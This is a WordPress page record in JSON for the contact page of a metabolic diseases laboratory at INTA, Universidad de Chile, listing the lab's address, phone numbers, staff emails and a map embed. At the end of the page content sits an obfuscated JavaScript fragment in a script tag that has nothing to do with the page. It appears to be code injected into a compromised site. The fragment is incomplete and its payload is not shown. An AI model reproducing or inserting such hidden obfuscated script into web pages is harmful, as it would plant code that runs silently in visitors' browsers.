{"id":37,"date":"2020-02-11T22:02:55","date_gmt":"2020-02-12T01:02:55","guid":{"rendered":"http:\/\/metabolicaschile.cl\/new-site\/?page_id=37"},"modified":"2022-04-17T23:27:50","modified_gmt":"2022-04-18T03:27:50","slug":"contacto","status":"publish","type":"page","link":"https:\/\/metabolicaschile.cl\/new-site\/contacto\/","title":{"rendered":"Contacto"},"content":{"rendered":"\n<p><em>Nuestro laboratorio est\u00e1 inserto en el Instituto de Nutrici\u00f3n y Tecnolog\u00eda de los Alimentos (INTA), Doctor Fernando Monckeberg Barros de la Universidad de Chile<\/em>&nbsp; <\/p>\n\n\n\n<p><strong>Nos pueden encontrar en av. El L\u00edbano 5524, Macul, Santiago O a trav\u00e9s de los siguientes contactos:<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><\/td><td><\/td><\/tr><tr><td>Oficina Nutricionistas<\/td><td>229781529<\/td><\/tr><tr><td>CEDINTA ( solicitud de horas medicas )<\/td><td>229781467<\/td><\/tr><tr><td>Secretaria enfermedades metab\u00f3licas ( solicitud de licencias m\u00e9dicas )<\/td><td>229781484<\/td><\/tr><tr><td>Dr Juan Francisco Cabello<\/td><td>jfcabello@inta.uchile.cl<\/td><\/tr><tr><td>Dra Carolina Arias<\/td><td>carias@inta.uchile.cl<\/td><\/tr><tr><td>Dra Pilar Peredo<\/td><td>pilar.peredo@inta.uchile.cl<\/td><\/tr><tr><td>Nta. Florencia Salazar<\/td><td>mfsalazar@inta.uchile.cl<\/td><\/tr><tr><td>Nta. Valerie Hamilton<\/td><td>vhamilton@inta.uchile.cl<\/td><\/tr><tr><td>Nta. Felipe Pe\u00f1aloza<\/td><td>felipe.penaloza@inta.uchile.cl<\/td><\/tr><tr><td>Pedidos formulas metab\u00f3licas<\/td><td>pedidosformulas@gmail.com<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h2>Ubicaci\u00f3n<\/h2>\n\n\n\n<iframe src=\"https:\/\/www.google.com\/maps\/embed?pb=!1m18!1m12!1m3!1d3326.9783507005905!2d-70.59506698495063!3d-33.50194038075911!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x9662d040a637aecd%3A0x231d842f77cbba3d!2sEl%20L%C3%ADbano%205524%2C%20Macul%2C%20Regi%C3%B3n%20Metropolitana!5e0!3m2!1sen!2scl!4v1644895674276!5m2!1sen!2scl\" width=\"600\" height=\"450\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\"><\/iframe>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script>","protected":false},"excerpt":{"rendered":"<p>Nuestro laboratorio est\u00e1 inserto en el Instituto de Nutrici\u00f3n y Tecnolog\u00eda de los Alimentos (INTA), Doctor Fernando Monckeberg Barros de la Universidad de Chile&nbsp; Nos pueden encontrar en av. El L\u00edbano 5524, Macul, Santiago O a trav\u00e9s de los siguientes contactos: Oficina Nutricionistas 229781529 CEDINTA ( solicitud de horas medicas [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":469,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/37"}],"collection":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":8,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/37\/revisions"}],"predecessor-version":[{"id":824,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/pages\/37\/revisions\/824"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media\/469"}],"wp:attachment":[{"href":"https:\/\/metabolicaschile.cl\/new-site\/wp-json\/wp\/v2\/media?parent=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}